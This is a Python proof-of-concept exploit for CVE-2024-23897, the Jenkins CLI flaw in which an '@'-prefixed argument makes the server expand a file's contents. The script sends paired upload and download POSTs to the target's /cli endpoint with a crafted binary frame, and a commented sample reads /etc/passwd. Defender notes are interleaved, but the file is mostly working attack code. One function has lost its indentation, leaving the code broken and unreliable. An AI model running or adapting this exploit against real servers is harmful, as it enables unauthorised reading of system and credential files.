CVE-2024-23897.py
import argparse
from uuid import uuid4
from requests import Session, post, exceptions
from time import sleep
from threading import Thread
def request1(url,uuidval,params):
    """Send the "download" side of the two-request CLI exchange.

    Issues one POST to ``url`` with the query string ``params`` and the
    headers ``Side: download`` and ``Session: <uuidval>``. The request is
    routed through a hard-coded local proxy at 127.0.0.1:8080, so nothing
    is sent unless a proxy is listening there. The response object is
    bound to a local name and never inspected.

    Detection note: in reverse-proxy or web-server logs this side shows up
    as a POST carrying a ``Side: download`` header, paired with a
    ``Side: upload`` POST that has the same ``Session`` value (see
    request2). main() points both at ``<base>/cli`` with
    ``remoting=false``.

    Args:
        url: Full URL the POST is sent to.
        uuidval: Value placed in the ``Session`` header.
        params: Query-string parameters for the POST.

    On ConnectTimeout / ConnectionError a message is printed and exit(1)
    is called.
    """
    upstream = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    download_headers = {"Side": "download", "Session": uuidval}
    client = Session()
    try:
        # Result is kept only as an unused local, as in the original.
        reply = client.post(
            url,
            params=params,
            headers=download_headers,
            proxies=upstream,
        )
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):
        print("Could not connect to target to setup the listener.")
        exit(1)
def request2(url,uuidval,params,payload):
    """Send the "upload" side of the two-request CLI exchange.

    Waits 0.5 s, then POSTs ``payload`` as the request body to ``url``
    with the headers ``Side: upload`` and ``Session: <uuidval>``, through
    the same hard-coded local proxy (127.0.0.1:8080) that request1 uses.

    Detection note: the body is the binary frame sequence produced by
    get_payload(); a ``Side: upload`` POST whose body contains an
    argument frame starting with ``@`` is the pattern to look for when
    triaging CVE-2024-23897 in captured traffic.

    Args:
        url: Full URL the POST is sent to.
        uuidval: Value placed in the ``Session`` header; main() passes the
            same value to request1.
        params: Query-string parameters for the POST.
        payload: Raw bytes sent as the request body.

    On ConnectTimeout / ConnectionError a message is printed; the
    function then returns normally.
    """
    sleep(0.5)
    # A Session is created here but not used; the POST below goes through
    # the module-level requests.post().
    session = Session()
    upload_headers = {"Side": "upload", "Session": uuidval}
    # Reference sample of a complete body, kept from the original source:
    #payload = b"\x00\x00\x00\x0E\x00\x00\x0Cconnect-node\x00\x00\x00\x0E\x00\x00\x0C@/etc/passwd\x03"
    upstream = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    try:
        post(
            url,
            data=payload,
            params=params,
            headers=upload_headers,
            proxies=upstream,
        )
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):
        print("Could not connect to the target to send the request.")
def createpayload(a: int, path: str) -> bytes:
text_bytes = bytes(path, "utf-8")
text_size = len(text_bytes)
text_message = text_size.to_bytes(2) + text_bytes
message_size = len(text_message)
payload = message_size.to_bytes(4) + a.to_bytes(1) + text_message
return payload
def get_payload(filepath: str) -> bytes:
    """Assemble the request body sent by request2().

    The body is three parts concatenated in order:
        1. a frame (leading byte 0) carrying the text ``connect-node``
        2. a frame (leading byte 0) carrying ``@`` + ``filepath``
        3. a single trailing byte with value 3

    Defender note: CVE-2024-23897 is the Jenkins CLI issue in which an
    argument beginning with ``@`` is expanded by the server into the
    contents of the named file. The ``@``-prefixed frame built here is
    therefore the part of the body worth matching on in traffic captures.
    Remediation is to upgrade to a fixed release per the vendor advisory,
    or to disable access to the CLI endpoint.

    Args:
        filepath: Text appended after ``@`` in the second frame.

    Returns:
        The concatenated body bytes.
    """
    frame_kind = 0
    terminator = 3
    parts = (
        createpayload(frame_kind, "connect-node"),
        createpayload(frame_kind, f"@{filepath}"),
        terminator.to_bytes(1),
    )
    return b"".join(parts)
def main():
    """Parse the command line and run the two requests on separate threads.

    Requires ``-u/--url`` and ``-p/--path``. ``/cli`` is appended to the
    URL, the query string is fixed to ``remoting=false``, and a fresh
    UUID4 string is used as the shared ``Session`` header value for both
    requests. request1 is started first; request2 is started one second
    later (and itself sleeps another 0.5 s before sending). Both threads
    are marked daemon and then joined.

    Nothing returned by the server is printed by this script; both
    requests go through the proxy hard-coded in request1/request2.
    """
    cli = argparse.ArgumentParser(description="CVE-2024-23897")
    cli.add_argument("-u", '--url', required=True, help="The target URL")
    cli.add_argument("-p", '--path', required=True, help="The target Path")
    opts = cli.parse_args()

    endpoint = opts.url + '/cli'
    query = {"remoting":"false"}
    # One random identifier ties the download and upload requests together.
    session_id = str(uuid4())
    body = get_payload(opts.path)

    downloader = Thread(target=request1, args=(endpoint, session_id, query))
    uploader = Thread(target=request2, args=(endpoint, session_id, query, body))
    for worker in (downloader, uploader):
        worker.daemon = True

    downloader.start()
    # Give the download side time to be established before uploading.
    sleep(1)
    uploader.start()

    for worker in (downloader, uploader):
        worker.join()


if __name__ == "__main__":
    main()